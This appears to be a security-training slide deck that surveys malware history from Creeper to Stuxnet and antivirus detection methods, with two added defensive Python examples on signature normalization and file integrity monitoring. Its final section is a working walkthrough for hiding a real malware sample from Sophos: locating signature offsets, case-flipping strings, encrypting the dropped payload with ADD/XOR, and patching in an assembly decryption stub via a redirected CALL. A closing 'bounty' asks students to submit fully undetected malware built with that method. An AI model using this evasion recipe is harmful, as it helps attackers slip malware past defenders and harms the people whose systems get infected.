AntiVirus HAX!
Presented by Ehab Hussein
Synapse Malware Research Team: Sofiane Talmat (Algeria), Ehab Hussein (Egypt), Saad Talaat (Egypt), Amr Thabet (Egypt)
http://www.synapse-labs.com [email protected]
Agenda: Synapse Intro; History; AV Detection Techniques; Bypassing Sophos :); Demo; Student Bounty Challenge $$$
Synapse: Security Corporate Services, Solution Development, Trainings
Viruses don't harm, ignorance does!
« The Evolution of malware within the last ten years is described by the evolution of people who develop that » (Eugene Kaspersky)
1948 – 1966 (First Theoretical Approach): John von Neumann, « Theory of self-reproducing automata »
1971 (First Worm): Robert (Bob) H. Thomas (BBN Technologies)
"I'm the creeper, catch me if you can!"
Machine: PDP-10; System: TENEX; Transport: ARPANET
ARPANET was the world's first operational packet-switching network and the core of the set of networks that came to compose the global Internet. Funded by DARPA.
WORM
TROJAN HORSE
1974/1975 (First Trojan Virus): John Walker, « ANIMAL », UNIVAC 1108
1982 (First Microcomputer Virus): Rich Skrenta, « Elk Cloner », Apple II boot sector
BOOT SECTOR
1986 (First IBM-PC Virus): Basit & Amjad Farooq Alvi, « Brain Boot Sector », « Pakistan Flu », « Lahore »
1986 (First File Infector Virus): Ralf Burger, « Virdem model », .com infector
Program output as shown on the slide:
VirDem Ver.: 1.06 (Generation #) aktive.
Copyright by R.Burger 1986,1987
Phone.: D - 05932/5451
This is a demoprogram for computerviruses. Please put in a number now. If you're right, you'll be able to continue. The number is between 0 and x
COM INFECTION
1987 (Destructive Viruses): Vienna / Lehigh / Yale / Stoned / Ping Pong
Cascade (self-encrypting file virus); IBM Antivirus
1987: Jerusalem « Infecting .EXE » (Interrupt; Friday 13th); also known as 1808 (EXE), 1813 (COM), ArabStar, BlackBox, BlackWindow, Friday13th, HebrewUniversity, Israeli, PLO, Russian
EXE INFECTION
1988 (First Internet Worm): Robert Tappan Morris, « The Morris worm », buffer overflow, 6000 infections
BUFFER OVERFLOW
1988 (First Multipartite Virus): Ghostball, EXE/COM/Boot Sector
Multipartite virus: a multipartite virus is a computer virus that infects and spreads in multiple ways. The term was coined to describe the first viruses that included both DOS executable-file and PC BIOS boot-sector virus code, where both parts are viral themselves. For a complete cleanup, all parts of the virus must be removed.
1988 (First Polymorphic Virus): Mark Washburn & Ralf Burger, « the Chameleon family », « Vienna and Cascade », 1260
POLYMORPHISM
1995 (First Macro Virus): « Concept »
Sub MAIN
REM That's enough to prove my point
End Sub
Macro virus: a macro language is a language built into a software application such as a word processor. Some applications (notably, but not exclusively, parts of Microsoft Office) allow macro programs to be embedded in documents, so that the programs run automatically when the document is opened.
1998: Chen Ing Hau, CIH v1 « Chernobyl / Spacefiller »
Payload: overwriting critical information on infected system drives and, more importantly, in some cases corrupting the system BIOS.
1999 (Year of the Worms)
Jan 20: Happy99 worm (emails) (Spanska)
March 26: Melissa worm (Microsoft Word / Outlook)
June 06: ExploreZip worm (Microsoft Office documents)
December 30: Kak worm (JavaScript worm / Outlook Express bug)
2000 (The Most Damaging Worm Ever): « ILOVEYOU worm (VBS/Loveletter) », VBScript
2000 (The Year of Exploits)
May: Sadmind worm (Sun Solaris / Microsoft IIS)
July: Code Red worm (Microsoft IIS indexing)
September: Nimda worm (Windows / Code Red / Sadmind)
October: Klez worm (MS IE / MS Outlook / Outlook Express)
2002 (Metamorphic Virus): Mental Driller, « Win32/Simile » (Etap / MetaPHOR); 90% metamorphose; May 14 / system locale
METAMORPHIC VIRUS
Metamorphic code is code that can reprogram itself. Often it does this by translating its own code into a temporary representation, editing that temporary representation of itself, and then writing itself back to normal code again. This procedure is applied to the virus itself, so the metamorphic engine itself also undergoes changes. Some viruses use it when they are about to infect new files, and the result is that the "children" never look like their "parents".
2002/2003 (Rise of the RAT & Trojans): a RAT, or remote access trojan (sometimes remote administration tool), is a program that listens for and accepts connections from a remote third party and carries out the commands that third party gives it.
Examples: Beast (Delphi), Optix Pro, Graybird, ProRat
2004 (First Web Worm): « Santy »
- Target: phpBB forums
- 40,000 site infections
2006 (First Ever Mac OS X Virus): « OSX/Leap-A or OSX/Oompa-A »
LAN worm, Bonjour protocol (iChat buddy list)
2007: « ZEUS » (drive-by downloads / phishing)
June 2009: 74,000 FTP accounts; 3.6 million infections in the USA
28 Oct. 2009: 1.5 million phishing messages on Facebook
14/15 Nov. 2009: 9 million infected emails (Verizon Wireless); credit cards of 15 banks compromised
1 Oct. 2010: FBI / $70 million and 90 arrests
May 2011: source code release
2007 (Bounty: $250,000): « Conficker »
NetBIOS exploit, MS08-067
BOTNET
Cyber Weapons !!!!!
2010: STUXNET, destructive (targets industrial systems)
2011: Duqu, NON destructive (targets industrial systems to gather information that could be useful in attacking)
AntiViruses
Possibly the first publicly documented removal of a computer virus in the wild was performed by Bernd Fix in 1987.
Enough said...
Detections
Signature-Based Detection
Behaviour-Based Detection
Normalization
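Normalization is the step that keeps signature matching useful against cheap mutations of a known pattern: the scanner canonicalizes the bytes (case-folds ASCII, collapses UTF-16LE text to its narrow form, strips a single-byte XOR or ADD layer) before comparing them with its patterns. The Python example below is added here to illustrate that; it is not code from the talk or from any AV engine, and its signature names, marker strings, sample buffers and view labels are all constructed for the demonstration.

```python
"""Signature scanning with and without normalization.

Added example, not code from the talk or from any AV engine. Signatures,
sample buffers and view labels are constructed for the demonstration.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterator


@dataclass(frozen=True)
class Signature:
    name: str
    pattern: bytes  # stored lower-case so a case-folded view can match it


# Constructed signature set (not real AV signatures).
SIGNATURES = [
    Signature("Demo.Dropper.A", b"dropper_payload_marker"),
    Signature("Demo.Resource.B", b"resource_marker_v1"),
]


def _table(fn) -> bytes:
    """Build a 256-entry bytes.translate() table from a per-byte function."""
    return bytes(fn(b) & 0xFF for b in range(256))


def _views(buf: bytes) -> Iterator[tuple[str, bytes]]:
    """Yield (label, normalized view) pairs for one buffer.

    Every view is ASCII case-folded so the lower-case patterns match.
    """
    yield "raw", buf.lower()
    # UTF-16LE ASCII text is the narrow string with a 0x00 after each byte;
    # decimating by two (both alignments) recovers the narrow form.
    yield "utf16le-even", buf[0::2].lower()
    yield "utf16le-odd", buf[1::2].lower()
    # Single-byte "x-ray": undo every possible one-byte XOR or ADD layer.
    for key in range(1, 256):
        yield f"xor-{key:#04x}", buf.translate(_table(lambda b: b ^ key)).lower()
        yield f"sub-{key:#04x}", buf.translate(_table(lambda b: b - key)).lower()


def scan_raw(buf: bytes, sigs=SIGNATURES) -> set[str]:
    """Exact byte matching: what a scanner without normalization does."""
    return {s.name for s in sigs if s.pattern in buf}


def scan_normalized(buf: bytes, sigs=SIGNATURES) -> dict[str, str]:
    """Return {signature name: label of the first view in which it matched}."""
    hits: dict[str, str] = {}
    for label, view in _views(buf):
        for s in sigs:
            if s.name not in hits and s.pattern in view:
                hits[s.name] = label
    return hits


MARKER = b"dropper_payload_marker"
RESOURCE = b"resource_marker_v1"
HEADER = b"MZ\x90\x00"  # constructed stand-in for a PE header

# Constructed samples: the same marker under mutations a scanner must undo.
SAMPLES = {
    "clean": HEADER + b"this buffer carries no known marker",
    "exact": HEADER + MARKER,
    "case_flipped": HEADER + b"DrOpPeR_PaYlOaD_MaRkEr",
    "utf16": HEADER + RESOURCE.decode("ascii").encode("utf-16-le"),
    "xor27": HEADER + MARKER.translate(_table(lambda b: b ^ 0x27)),
    # two stages, ADD 0x20 then XOR 0x27: beyond what a single-key x-ray undoes
    "add20_xor27": HEADER + MARKER.translate(_table(lambda b: (b + 0x20) ^ 0x27)),
}


def report() -> dict[str, tuple[set[str], dict[str, str]]]:
    """Raw and normalized results for every constructed sample."""
    return {name: (scan_raw(buf), scan_normalized(buf)) for name, buf in SAMPLES.items()}


if __name__ == "__main__":
    for name, (raw, norm) in report().items():
        print(f"{name:12s} raw={sorted(raw)!s:20s} normalized={norm}")
```

The raw scan only finds the `exact` sample; the normalized scan also catches the case-flipped copy, the UTF-16LE resource string and the single-XOR layer. The last sample is the limit of static normalization: no single-key view recovers the ADD-then-XOR encoding, which is why engines fall back to emulation or behaviour monitoring for code that decrypts itself at run time.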
What About Rootkits?
Signature-Based File Integrity Monitoring (ex: Tripwire)
Hooking Detection
Network-Based Detection
Heuristics-Based Detection
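File integrity monitoring in the Tripwire sense means hashing known-good files once, keeping that baseline where the monitored host cannot silently rewrite it, and re-hashing later to report additions, removals and modifications. The Python example below is added here and is not code from the talk or from Tripwire: it baselines a constructed temporary directory, signs the baseline with an HMAC so that tampering with the baseline itself is caught, and reports the drift after a simulated patch, drop and deletion. The key, file names and file contents are all constructed.

```python
"""Tripwire-style file integrity monitoring: baseline, compare, protect the baseline.

Added example, not code from the talk or from Tripwire. File names, contents
and the signing key are constructed inside a temporary directory.
"""
from __future__ import annotations

import hashlib
import hmac
import json
import os
import tempfile


def hash_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so large binaries do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict[str, str]:
    """Map every file under root (path relative to root, '/'-separated) to its hash."""
    baseline: dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full)
    return baseline


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Report files that appeared, disappeared, or changed content."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(p for p in common if baseline[p] != current[p]),
    }


def sign_baseline(baseline: dict[str, str], key: bytes) -> bytes:
    """Serialize the baseline with an HMAC-SHA256 tag over its canonical form."""
    body = json.dumps(baseline, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return json.dumps({"baseline": baseline, "hmac": tag}).encode()


def load_baseline(blob: bytes, key: bytes) -> dict[str, str]:
    """Verify the tag before trusting the stored hashes; raise on any mismatch."""
    doc = json.loads(blob)
    body = json.dumps(doc["baseline"], sort_keys=True).encode()
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["hmac"]):
        raise ValueError("baseline integrity check failed")
    return doc["baseline"]


def _write(root: str, rel: str, data: bytes) -> None:
    """Create a constructed sample file (and its directories) under root."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo() -> dict:
    """Baseline a constructed tree, simulate drift and tampering, return what FIM reports."""
    key = b"constructed-demo-key"  # in practice kept off the monitored host
    with tempfile.TemporaryDirectory() as root:
        _write(root, "bin/app.exe", b"MZ\x90\x00original program")
        _write(root, "bin/helper.dll", b"MZ\x90\x00helper library")
        _write(root, "etc/app.conf", b"debug=0\n")
        stored = sign_baseline(build_baseline(root), key)

        # Simulated drift: a patched binary, a dropped file, a deleted library.
        _write(root, "bin/app.exe", b"MZ\x90\x00patched program")
        _write(root, "bin/dropped.exe", b"MZ\x90\x00new arrival")
        os.remove(os.path.join(root, "bin", "helper.dll"))
        drift = compare(load_baseline(stored, key), build_baseline(root))

        # Rewriting the stored hash to match the patched file still fails
        # verification, because the HMAC over the baseline no longer matches.
        doc = json.loads(stored)
        doc["baseline"]["bin/app.exe"] = hash_file(os.path.join(root, "bin", "app.exe"))
        try:
            load_baseline(json.dumps(doc).encode(), key)
            tamper_detected = False
        except ValueError:
            tamper_detected = True
    return {"drift": drift, "tamper_detected": tamper_detected}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The HMAC is what separates this from a plain hash list: a baseline stored unsigned on the same host is only as trustworthy as the host, and a rootkit that can patch a binary can equally patch the list of expected hashes.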
Let's Bypass That AV #Demo
1- Locate the signature. In our case we have:
A- The "turko" signature:
0x00003F87 0x00000005
0x00004343 0x00000005
0x000044EF 0x00000005
0x0002E754 0x00000005
0x0002E76C 0x00000005
0x0002E78F 0x00000005
B- The start of the MZ file to be dropped: the MZ signature starts at 37D64 ("MZP"). Before the MZP there is another signature, in Unicode, starting at 37D1A; it begins with the Unicode string DENAME.
2- Patching the signature:
A- The "turko" signature: all we can do is change some characters to capital letters (playing with case) for all the patterns found.
B- We need to encrypt the signature starting from 37D1A (43F11A in the debugger). In Hex Workshop we load the exe, go to address 37D1A (43F11A in the debugger), select from there to the end of the file (approx. 0xBC6E bytes), go to Tools/Operations and apply some encryption, for example:
Add 20
Xor 27
Now back in the debugger: we load the exe, go to the DATA section at address 43F11A and select the following part:
0043F11A 44 00 45 00 4E 00 45 00 D.E.N.E.
0043F122 4D 00 45 00 06 00 44 00 M.E..D.
0043F12A 56 00 43 00 4C 00 41 00 V.C.L.A.
0043F132 4C 00 03 00 45 00 44 00 L..E.D.
0043F13A 54 00 0B 00 50 00 41 00 T..P.A.
0043F142 43 00 4B 00 41 00 47 00 C.K.A.G.
0043F14A 45 00 49 00 4E 00 46 00 E.I.N.F.
0043F152 4F 00 07 00 52 00 4F 00 O..R.O.
0043F15A 4F 00 54 00 4B 00 49 00 O.T.K.I.
0043F162 54 00 4D 5A 50 T.MZP
We put a memory breakpoint on access on that range.
We run the exe; the breakpoint is hit at the following instruction:
7C9350C0 0FB706 MOVZX EAX,WORD PTR DS:[ESI]
We can see it is in NTDLL.DLL. We look into the stack and search for the return address into our binary, so we can locate the original call address. We find the following in the stack:
0012FF00 |00403EC9 É>@. RETURN to unpacked.00403EC9 from
We go to address 00403EC9 and find the following instruction just before the return address:
00403EC4 |. E8 AFF8FFFF CALL
We take that address and instruction and save them.
Next we go to the end of the exe, let's say address 004307A2, and write our decryption function:
004307A2 > 60 PUSHAD
004307A3 . 9C PUSHFD
004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A
004307A9 . B9 E6BC0000 MOV ECX,0BCE6
004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI]
004307B0 . 80F3 27 XOR BL,27
004307B3 . 80EB 20 SUB BL,20
004307B6 . 881F MOV BYTE PTR DS:[EDI],BL
004307B8 . 47 INC EDI
004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE
004307BB . 9D POPFD
004307BC . 61 POPAD
Now we change the instruction:
00403EC4 |. E8 AFF8FFFF CALL
to:
00403EC4 . E9 D9C80200 JMP Copy_of_.004307A2 ; (JMP 004307A2)
so that execution jumps to our decryption function.
After the decryption loop we add the overwritten call and a jump back, like the following:
004307A2 > 60 PUSHAD
004307A3 . 9C PUSHFD
004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A
004307A9 . B9 E6BC0000 MOV ECX,0BCE6
004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI]
004307B0 . 80F3 27 XOR BL,27
004307B3 . 80EB 20 SUB BL,20
004307B6 . 881F MOV BYTE PTR DS:[EDI],BL
004307B8 . 47 INC EDI
004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE
004307BB . 9D POPFD
004307BC . 61 POPAD
004307BD . E8 B62FFDFF CALL
The last step is to mark our memory location at 0043F11A as writeable so we can decrypt the data there; we do it with PE Explorer, for example.
Bounty challenge: $50 discount on any Synapse course & recognition on the Synapse Labs Facebook page, to the student who sends us fully undetected malware using our same technique from the demo.
Thank you
Facebook.com/Synapse.Labs; Twitter: @Synapse_Labs
My Twitter: @__Obzy__; my Facebook: www.facebook.com/Obzysynapse